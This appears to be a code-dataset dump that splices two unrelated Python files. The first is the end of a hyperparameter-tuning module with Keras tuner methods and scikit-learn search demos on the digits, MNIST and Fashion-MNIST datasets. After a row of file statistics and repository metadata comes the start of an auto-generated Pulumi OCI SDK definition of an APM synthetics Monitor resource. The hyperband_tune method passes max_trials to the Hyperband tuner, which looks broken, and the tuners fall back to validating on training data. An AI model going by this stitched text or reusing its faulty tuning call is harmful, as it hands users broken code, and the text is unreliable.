return tuner
def bayesian_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
self.X_train = x_train.copy()
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_BayesianOptimization(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def hyperband_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
self.X_train = x_train.copy()
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Hyperband(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def demo_bayesian():
import matplotlib.pyplot as plt
from sklearn.datasets import load_digits
from sklearn.ensemble import RandomForestClassifier
model = RandomForestClassifier
param_space = [(3, 15, 'max_depth'), (100, 600, 'n_estimators'),
(['gini', 'entropy'], 'criterion'), (0.01, 1, 'max_features')]
accuracy_measurement = partial(f1_score, average='macro')
X, y = load_digits(n_class=10, return_X_y=True)
tuning = Bayesian(
model_callable=model,
param_space=param_space,
x_train=X,
y_train=y,
kfold_n_splits=5,
score_sign=-1,
score_measure=accuracy_measurement,
x_test=None,
y_test=None
)
result, bayesian_callback = tuning.train(n_calls=10, verbose=True)
print('#################################')
print('accuracy history:')
print(bayesian_callback.accuracies)
print('config history:')
print(bayesian_callback.configs)
print(f'Best result happened at {bayesian_callback.configs.index(result.x)+1}th trial')
print('Best parameters are: ', dict(zip(tuning.param_names, result.x)))
print('Best score:', min(bayesian_callback.accuracies))
plt.figure(figsize=(15, 8))
plt.scatter(range(len(bayesian_callback.accuracies)), bayesian_callback.accuracies)
plt.title('score changes by trials')
plt.show()
def demo_grid_search():
import matplotlib.pyplot as plt
from sklearn.datasets import load_digits
from sklearn.ensemble import RandomForestClassifier
model = RandomForestClassifier
param_space = {
'max_depth': list(range(3, 16, 5)),
'n_estimators': list(range(100, 601, 200)),
'criterion': ['gini', 'entropy'],
'max_features': np.linspace(0.01, 1, 3)
}
accuracy_measurement = partial(f1_score, average='macro')
X, y = load_digits(n_class=10, return_X_y=True)
tuning = GridSearch(
model_callable=model,
param_space=param_space,
x_train=X,
y_train=y,
kfold_n_splits=5,
score_measure=accuracy_measurement,
x_test=None,
y_test=None
)
result = tuning.train(verbose=True)
print('#################################')
print('accuracy history:')
print([j for i, j, k in tuning.history])
print('config history:')
print([i for i, j, k in tuning.history])
print('Best parameters are: ', result[0][0])
print('Best score:', result[0][1])
plt.figure(figsize=(15, 8))
plt.scatter(range(len([j for i, j, k in tuning.history])), [j for i, j, k in tuning.history])
plt.title('scores from all grids')
plt.show()
def demo_random_search():
import matplotlib.pyplot as plt
from scipy.stats.distributions import uniform
from sklearn.datasets import load_digits
from sklearn.ensemble import RandomForestClassifier
model = RandomForestClassifier
param_space = {
'max_depth': list(range(3, 16, 5)),
'n_estimators': list(range(100, 601, 200)),
'criterion': ['gini', 'entropy'],
'max_features': uniform(0.01, 1)
}
accuracy_measurement = partial(f1_score, average='macro')
X, y = load_digits(n_class=10, return_X_y=True)
tuning = RandomSearch(
model_callable=model,
param_space=param_space,
x_train=X,
y_train=y,
kfold_n_splits=5,
score_measure=accuracy_measurement,
x_test=None,
y_test=None
)
result = tuning.train(n_iter=10, random_state=0, verbose=True)
print('#################################')
print('accuracy history:')
print([j for i, j, k in tuning.history])
print('config history:')
print([i for i, j, k in tuning.history])
print('Best parameters are: ', result[0][0])
print('Best score:', result[0][1])
plt.figure(figsize=(15, 8))
plt.scatter(range(len([j for i, j, k in tuning.history])), [j for i, j, k in tuning.history])
plt.title('scores from all random params')
plt.show()
def keras_dense_turning_demo():
import os
from tensorflow import keras
from keras.datasets import mnist
kdm = keras_dense_model_tune(
n_layers_min_max_step=(5, 10, 1),
layer_size_min_max_step=(50, 100, 5),
output_layer_size_act=(None, 'softmax'),
activations=['relu'],
optimizers=['SGD'],
losses=['categorical_crossentropy']
)
(x_train, y_train), (x_test, y_test) = mnist.load_data()
image_vector_size = 28 * 28
x_train = x_train.reshape(x_train.shape[0], image_vector_size)
x_test = x_test.reshape(x_test.shape[0], image_vector_size)
num_classes = 10
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
tuner = kdm.bayesian_tune(
x_train,
y_train,
x_test,
y_test,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=os.getcwd(),
project_name='keras_dense_turning_demo'
)
tuner.results_summary()
def keras_conv_turning_demo():
import os
from tensorflow import keras
from keras.datasets import fashion_mnist
kdm = keras_conv2d_model_tune(
n_conv_layers_min_max_step=(5, 10, 1),
conv_layer_size_min_max_step=(32, 256, 32),
kernel_size_min_max_step=(3, 3, 1),
strides_min_max_step=(1, 1, 1),
output_layer_size_act=(None, 'softmax'),
activations=['relu'],
optimizers=['SGD'],
losses=['categorical_crossentropy']
)
(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)
x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)
num_classes = 10
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
tuner = kdm.bayesian_tune(
x_train,
y_train,
x_test,
y_test,
epochs=10,
batch_size=32,
n_trials=2,
executions_per_trial=1,
save_dir=os.getcwd(),
project_name='keras_conv_turning_demo'
)
tuner.results_summary()
| 34.353671 | 217 | 0.578326 | 4,155 | 33,220 | 4.335499 | 0.080385 | 0.020984 | 0.017764 | 0.008882 | 0.805707 | 0.759132 | 0.742145 | 0.711946 | 0.705507 | 0.690074 | 0 | 0.015644 | 0.322697 | 33,220 | 966 | 218 | 34.389234 | 0.784978 | 0.056291 | 0 | 0.722222 | 0 | 0.003704 | 0.07162 | 0.019386 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.035802 | 0 | 0.092593 | 0.034568 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5b0e1661776b8df217c552e42ac9e5072f44617c | 57,050 | py | Python | sdk/python/pulumi_oci/apmsynthetics/monitor.py | EladGabay/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2021-08-17T11:14:46.000Z | 2021-12-31T02:07:03.000Z | sdk/python/pulumi_oci/apmsynthetics/monitor.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-09-06T11:21:29.000Z | 2021-09-06T11:21:29.000Z | sdk/python/pulumi_oci/apmsynthetics/monitor.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-24T23:31:30.000Z | 2022-01-02T19:26:54.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MonitorArgs', 'Monitor']
@pulumi.input_type
class MonitorArgs:
def __init__(__self__, *,
apm_domain_id: pulumi.Input[str],
display_name: pulumi.Input[str],
monitor_type: pulumi.Input[str],
repeat_interval_in_seconds: pulumi.Input[int],
vantage_points: pulumi.Input[Sequence[pulumi.Input[str]]],
configuration: Optional[pulumi.Input['MonitorConfigurationArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Monitor resource.
:param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
:param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
:param pulumi.Input[str] monitor_type: Type of monitor.
:param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
:param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
:param pulumi.Input['MonitorConfigurationArgs'] configuration: (Updatable) Details of monitor configuration.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
:param pulumi.Input[str] script_name: Name of the script.
:param pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
:param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
:param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
:param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
"""
pulumi.set(__self__, "apm_domain_id", apm_domain_id)
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "monitor_type", monitor_type)
pulumi.set(__self__, "repeat_interval_in_seconds", repeat_interval_in_seconds)
pulumi.set(__self__, "vantage_points", vantage_points)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if script_id is not None:
pulumi.set(__self__, "script_id", script_id)
if script_name is not None:
pulumi.set(__self__, "script_name", script_name)
if script_parameters is not None:
pulumi.set(__self__, "script_parameters", script_parameters)
if status is not None:
pulumi.set(__self__, "status", status)
if target is not None:
pulumi.set(__self__, "target", target)
if timeout_in_seconds is not None:
pulumi.set(__self__, "timeout_in_seconds", timeout_in_seconds)
@property
@pulumi.getter(name="apmDomainId")
def apm_domain_id(self) -> pulumi.Input[str]:
"""
(Updatable) The APM domain ID the request is intended for.
"""
return pulumi.get(self, "apm_domain_id")
@apm_domain_id.setter
def apm_domain_id(self, value: pulumi.Input[str]):
pulumi.set(self, "apm_domain_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
(Updatable) Unique name that can be edited. The name should not contain any confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="monitorType")
def monitor_type(self) -> pulumi.Input[str]:
"""
Type of monitor.
"""
return pulumi.get(self, "monitor_type")
@monitor_type.setter
def monitor_type(self, value: pulumi.Input[str]):
pulumi.set(self, "monitor_type", value)
@property
@pulumi.getter(name="repeatIntervalInSeconds")
def repeat_interval_in_seconds(self) -> pulumi.Input[int]:
"""
(Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
"""
return pulumi.get(self, "repeat_interval_in_seconds")
@repeat_interval_in_seconds.setter
def repeat_interval_in_seconds(self, value: pulumi.Input[int]):
pulumi.set(self, "repeat_interval_in_seconds", value)
@property
@pulumi.getter(name="vantagePoints")
def vantage_points(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
(Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
return pulumi.get(self, "vantage_points")
@vantage_points.setter
def vantage_points(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "vantage_points", value)
@property
@pulumi.getter
def configuration(self) -> Optional[pulumi.Input['MonitorConfigurationArgs']]:
"""
(Updatable) Details of monitor configuration.
"""
return pulumi.get(self, "configuration")
@configuration.setter
def configuration(self, value: Optional[pulumi.Input['MonitorConfigurationArgs']]):
pulumi.set(self, "configuration", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="scriptId")
def script_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
"""
return pulumi.get(self, "script_id")
@script_id.setter
def script_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "script_id", value)
@property
@pulumi.getter(name="scriptName")
def script_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the script.
"""
return pulumi.get(self, "script_name")
@script_name.setter
def script_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "script_name", value)
@property
@pulumi.getter(name="scriptParameters")
def script_parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]:
"""
(Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
"""
return pulumi.get(self, "script_parameters")
@script_parameters.setter
def script_parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]):
pulumi.set(self, "script_parameters", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Enables or disables the monitor.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@property
@pulumi.getter(name="timeoutInSeconds")
def timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
"""
return pulumi.get(self, "timeout_in_seconds")
@timeout_in_seconds.setter
def timeout_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_in_seconds", value)
@pulumi.input_type
class _MonitorState:
def __init__(__self__, *,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input['MonitorConfigurationArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
vantage_point_count: Optional[pulumi.Input[int]] = None,
vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Monitor resources.
:param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
:param pulumi.Input['MonitorConfigurationArgs'] configuration: (Updatable) Details of monitor configuration.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] monitor_type: Type of monitor.
:param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
:param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
:param pulumi.Input[str] script_name: Name of the script.
:param pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
:param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
:param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
:param pulumi.Input[str] time_created: The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
:param pulumi.Input[str] time_updated: The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
:param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
:param pulumi.Input[int] vantage_point_count: Number of vantage points where monitor is running.
:param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
if apm_domain_id is not None:
pulumi.set(__self__, "apm_domain_id", apm_domain_id)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if monitor_type is not None:
pulumi.set(__self__, "monitor_type", monitor_type)
if repeat_interval_in_seconds is not None:
pulumi.set(__self__, "repeat_interval_in_seconds", repeat_interval_in_seconds)
if script_id is not None:
pulumi.set(__self__, "script_id", script_id)
if script_name is not None:
pulumi.set(__self__, "script_name", script_name)
if script_parameters is not None:
pulumi.set(__self__, "script_parameters", script_parameters)
if status is not None:
pulumi.set(__self__, "status", status)
if target is not None:
pulumi.set(__self__, "target", target)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
if timeout_in_seconds is not None:
pulumi.set(__self__, "timeout_in_seconds", timeout_in_seconds)
if vantage_point_count is not None:
pulumi.set(__self__, "vantage_point_count", vantage_point_count)
if vantage_points is not None:
pulumi.set(__self__, "vantage_points", vantage_points)
@property
@pulumi.getter(name="apmDomainId")
def apm_domain_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The APM domain ID the request is intended for.
"""
return pulumi.get(self, "apm_domain_id")
@apm_domain_id.setter
def apm_domain_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "apm_domain_id", value)
@property
@pulumi.getter
def configuration(self) -> Optional[pulumi.Input['MonitorConfigurationArgs']]:
"""
(Updatable) Details of monitor configuration.
"""
return pulumi.get(self, "configuration")
@configuration.setter
def configuration(self, value: Optional[pulumi.Input['MonitorConfigurationArgs']]):
pulumi.set(self, "configuration", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Unique name that can be edited. The name should not contain any confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="monitorType")
def monitor_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of monitor.
"""
return pulumi.get(self, "monitor_type")
@monitor_type.setter
def monitor_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "monitor_type", value)
@property
@pulumi.getter(name="repeatIntervalInSeconds")
def repeat_interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
"""
return pulumi.get(self, "repeat_interval_in_seconds")
@repeat_interval_in_seconds.setter
def repeat_interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "repeat_interval_in_seconds", value)
@property
@pulumi.getter(name="scriptId")
def script_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
"""
return pulumi.get(self, "script_id")
@script_id.setter
def script_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "script_id", value)
@property
@pulumi.getter(name="scriptName")
def script_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the script.
"""
return pulumi.get(self, "script_name")
@script_name.setter
def script_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "script_name", value)
@property
@pulumi.getter(name="scriptParameters")
def script_parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]:
"""
(Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
"""
return pulumi.get(self, "script_parameters")
@script_parameters.setter
def script_parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]):
pulumi.set(self, "script_parameters", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Enables or disables the monitor.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
@property
@pulumi.getter(name="timeoutInSeconds")
def timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
"""
return pulumi.get(self, "timeout_in_seconds")
@timeout_in_seconds.setter
def timeout_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_in_seconds", value)
@property
@pulumi.getter(name="vantagePointCount")
def vantage_point_count(self) -> Optional[pulumi.Input[int]]:
"""
Number of vantage points where monitor is running.
"""
return pulumi.get(self, "vantage_point_count")
@vantage_point_count.setter
def vantage_point_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vantage_point_count", value)
@property
@pulumi.getter(name="vantagePoints")
def vantage_points(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
return pulumi.get(self, "vantage_points")
@vantage_points.setter
def vantage_points(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "vantage_points", value)
class Monitor(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
